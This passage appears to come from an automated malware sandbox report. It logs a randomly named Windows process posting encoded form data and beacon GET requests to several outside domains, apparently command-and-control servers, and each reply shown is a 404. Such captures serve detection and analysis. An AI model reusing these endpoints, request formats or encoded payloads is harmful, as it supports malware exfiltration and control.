                                                                                                                        Data Raw: 62 42 77 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 4d 38 31 37 63 50 53 6b 41 34 39 6c 67 79 4a 49 68 67 51 44 70 78 45 6e 37 4c 48 51 6b 31 6b 61 37 72 77 6a 47 37 47 45 73 36 31 5a 49 37 4a 68 50 6d 45 72 46 62 78 47 30 6a 61 68 6c 39 44 58 61 4f 5a 41 54 53 54 34 38 4d 45 59 4d 79 59 62 68 42 71 44 73 5a 57 34 67 6c 67 51 41 56 72 6e 6e 41 73 64 7a 53 70 34 61 62 35 6a 6d 47 6f 2b 74 6f 78 76 79 53 79 37 49 55 30 55 7a 48 61 7a 55 46 72 5a 32 73 51 45 65 75 56 58 6d 6f 78 6f 43 4e 52 39 68 75 49 62 6f 65 36 42 68 62 64 7a 69 4f 54 64 7a 79 41 51 3d 3d
                                                                                                                        Data Ascii: bBw=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PM817cPSkA49lgyJIhgQDpxEn7LHQk1ka7rwjG7GEs61ZI7JhPmErFbxG0jahl9DXaOZATST48MEYMyYbhBqDsZW4glgQAVrnnAsdzSp4ab5jmGo+toxvySy7IU0UzHazUFrZ2sQEeuVXmoxoCNR9huIboe6BhbdziOTdzyAQ==
Nov 21, 2024 16:21:26.929130077 CET | 380 | IN | HTTP/1.1 404 Not Found
content-type: text/html; charset=iso-8859-1
content-length: 196
date: Thu, 21 Nov 2024 15:21:26 GMT
server: LiteSpeed
x-tuned-by: N0C
connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49899 | 146.88.233.115 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:28.293591022 CET | 1644 | OUT | POST /11t3/ HTTP/1.1
Host: www.smartcongress.net
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.smartcongress.net
Cache-Control: max-age=0
Content-Length: 1228
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartcongress.net/11t3/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 55 38 70 59 55 50 64 6e 34 34 38 6c 67 79 49 49 68 6a 51 44 6f 68 45 6d 53 43 48 51 6f 50 6b 59 44 72 77 41 4f 37 42 32 55 36 67 4a 49 37 55 78 50 6e 4c 4c 46 4f 78 47 6b 76 61 68 56 39 44 58 61 4f 5a 44 37 53 55 70 38 4d 49 34 4d 31 66 62 68 4e 38 7a 73 31 57 35 49 54 67 52 30 76 72 30 2f 41 76 2b 62 53 71 4b 43 62 31 6a 6d 41 72 2b 74 4b 78 76 4f 4e 79 37 55 79 30 55 33 68 61 30 34 46 70 4d 50 6e 4b 58 32 6b 4f 78 33 64 36 50 65 74 66 4a 78 47 43 4b 77 43 76 45 73 31 4a 78 6a 61 61 74 79 63 43 35 59 41 55 2f 39 72 53 6f 71 63 6e 4d 35 68 38 49 49 42 64 2b 52 2f 74 34 4e 59 67 30 52 45 37 4f 51 66 65 4c 39 57 76 39 4f 61 6a 36 62 41 6b 47 34 56 61 6c 71 30 37 58 33 33 55 6e 38 72 31 6b 72 31 4b 2b 6b 77 68 44 44 59 48 54 44 58 4a 74 6e 47 41 32 75 42 2f 4c 70 34 78 69 70 50 38 4d 69 50 4e 76 4e 36 62 63 70 47 6a 35 70 74 43 72 79 50 46 37 44 7a 6f 57 6b 38 6c 45 [TRUNCATED]
Data Ascii: bBw= [TRUNCATED]
Nov 21, 2024 16:21:29.617098093 CET | 380 | IN | HTTP/1.1 404 Not Found
content-type: text/html; charset=iso-8859-1
content-length: 196
date: Thu, 21 Nov 2024 15:21:29 GMT
server: LiteSpeed
x-tuned-by: N0C
connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49905 | 146.88.233.115 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:30.961869001 CET | 343 | OUT | GET /11t3/?bBw=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013w88VAS70Y9JS73ZjbBY8NXuVWXuwPQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
Host: www.smartcongress.net
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:21:32.302743912 CET | 380 | IN | HTTP/1.1 404 Not Found
content-type: text/html; charset=iso-8859-1
content-length: 196
date: Thu, 21 Nov 2024 15:21:32 GMT
server: LiteSpeed
x-tuned-by: N0C
connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49923 | 194.85.61.76 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:38.504432917 CET | 604 | OUT | POST /2pji/ HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.mrpokrovskii.pro
Cache-Control: max-age=0
Content-Length: 192
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.mrpokrovskii.pro/2pji/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 56 49 42 6c 6e 71 72 58 31 36 62 45 45 2f 70 79 34 42 55 7a 34 37 4e 6f 6c 4c 73 43 68 45 6f 45 70 6b 39 66 74 65 76 62 67 78 38 66 5a 59 68 54 45 67 44 61 4f 5a 68 6b 59 42 62 4c 43 7a 61 6e 6c 38 77 36 51 79 51 56 37 44 52 72 75 76 59 53 39 33 4c 5a 2f 6d 68 39 63 64 53 6a 6a 36 51 66 55 4e 6e 72 4a 55 31 2b 56 56 70 31 57 73 71 30 44 4f 31 50 2f 49 72 6e 55 39 61 55 44 64 51 41 42 37 63 36 4f 2b 2f 2b 32 68 4b 4e 59 6e 4e 4d 35 41 57 59 6c 69 42 36 56 44 48 5a 2f 69 4b 72 65 35 70 6d 79 6e 4c 6f 54 6a 55 43 4f 69 77 31
                                                                                                                        Data Ascii: bBw=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYliB6VDHZ/iKre5pmynLoTjUCOiw1
Nov 21, 2024 16:21:39.889962912 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:21:39 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49931 | 194.85.61.76 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:41.176211119 CET | 628 | OUT | POST /2pji/ HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.mrpokrovskii.pro
Cache-Control: max-age=0
Content-Length: 216
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.mrpokrovskii.pro/2pji/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 41 45 71 41 35 66 72 71 62 62 6e 78 38 66 4d 6f 67 5a 4a 41 44 52 4f 5a 64 61 59 46 48 4c 43 7a 4f 6e 6c 2b 34 36 52 46 38 53 36 54 52 70 33 2f 59 51 6c 58 4c 5a 2f 6d 68 39 63 64 58 47 6a 38 34 66 56 38 58 72 49 31 31 39 4a 46 70 32 65 4d 71 30 49 75 31 55 2f 49 71 43 55 38 57 36 44 65 34 41 42 2f 59 36 4f 71 72 39 34 68 4b 4c 41 48 4d 6d 2b 56 4c 47 68 51 6b 69 4b 79 62 34 75 6a 71 59 5a 59 56 34 6a 56 43 7a 47 30 55 6c 4a 46 35 64 75 4a 6c 44 2b 74 4b 57 77 4a 68 65 32 6a 68 75 42 4d 6c 4e 31 41 3d 3d
                                                                                                                        Data Ascii: bBw=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0UlJF5duJlD+tKWwJhe2jhuBMlN1A==
Nov 21, 2024 16:21:42.553632021 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:21:42 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49937 | 194.85.61.76 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:43.847217083 CET | 1641 | OUT | POST /2pji/ HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.mrpokrovskii.pro
Cache-Control: max-age=0
Content-Length: 1228
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.mrpokrovskii.pro/2pji/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:21:45.235052109 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:21:45 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49943 | 194.85.61.76 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:46.512809992 CET | 342 | OUT | GET /2pji/?bBw=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT82t+6t4M73z602ZXRfzEt+UzcIaSeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1
Host: www.mrpokrovskii.pro
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:21:47.856329918 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:21:47 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49962 | 47.76.213.197 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:54.192934036 CET | 586 | OUT | POST /egqi/ HTTP/1.1
Host: www.ytsd88.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.ytsd88.top
Cache-Control: max-age=0
Content-Length: 192
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ytsd88.top/egqi/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: bBw=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeDNJ1xad7gBi8n/3gQmOdQf5ph/de
Nov 21, 2024 16:21:55.785877943 CET | 574 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:21:55 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49968 | 47.76.213.197 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:56.860708952 CET | 610 | OUT | POST /egqi/ HTTP/1.1
Host: www.ytsd88.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.ytsd88.top
Cache-Control: max-age=0
Content-Length: 216
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ytsd88.top/egqi/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: bBw=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFI5OmYU2nGnlunAs81WiIpZtFOsxIA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49976 | 47.76.213.197 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:59.540168047 CET | 1623 | OUT | POST /egqi/ HTTP/1.1
Host: www.ytsd88.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.ytsd88.top
Cache-Control: max-age=0
Content-Length: 1228
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ytsd88.top/egqi/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:22:01.155646086 CET | 574 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:22:00 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49982 | 47.76.213.197 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:02.197689056 CET | 336 | OUT | GET /egqi/?bBw=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8lot5wYlOl469WmdukWuN3NsqkmPJjQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
Host: www.ytsd88.top
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:22:03.833364010 CET | 574 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:22:03 GMT
Content-Type: text/html
Content-Length: 409
Connection: close
ETag: "66d016cf-199"
                                                                                                                        Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49995 | 208.91.197.27 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:09.627998114 CET | 616 | OUT | POST /hyyd/ HTTP/1.1
Host: www.matteicapital.online
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.matteicapital.online
Cache-Control: max-age=0
Content-Length: 192
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.matteicapital.online/hyyd/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 56 55 49 64 6e 47 68 68 34 68 66 4f 56 51 50 49 48 71 63 6c 33 61 33 56 6b 70 30 30 44 47 32 66 6f 49 4b 50 58 54 4b 6f 72 66 72 6c 78 57 64 46 57 4e 4e 77 4f 56 50 73 6d 79 33 2b 51 6f 4c 51 2f 44 34 6c 31 58 69 37 35 69 6a 55 61 79 57 75 47 57 58 5a 4a 69 6a 41 34 36 54 43 50 68 6f 37 41 69 36 36 73 48 30 58 49 36 4b 78 49 35 38 63 52 2b 4f 47 65 69 78 34 78 71 64 58 55 2f 4c 2f 4c 5a 32 49 73 59 62 43 50 39 31 50 68 54 54 39 66 48 79 38 6e 45 33 78 57 4a 6d 53 55 2b 2f 32 49 79 31 38 6d 2f 38 6e 52 72 37 66 68 4c 33 74
                                                                                                                        Data Ascii: bBw=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8nE3xWJmSU+/2Iy18m/8nRr7fhL3t


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 49996 | 208.91.197.27 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:22:12.295471907 CET | 640 | OUT | POST /hyyd/ HTTP/1.1
Host: www.matteicapital.online
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.matteicapital.online
Cache-Control: max-age=0
Content-Length: 216
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.matteicapital.online/hyyd/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
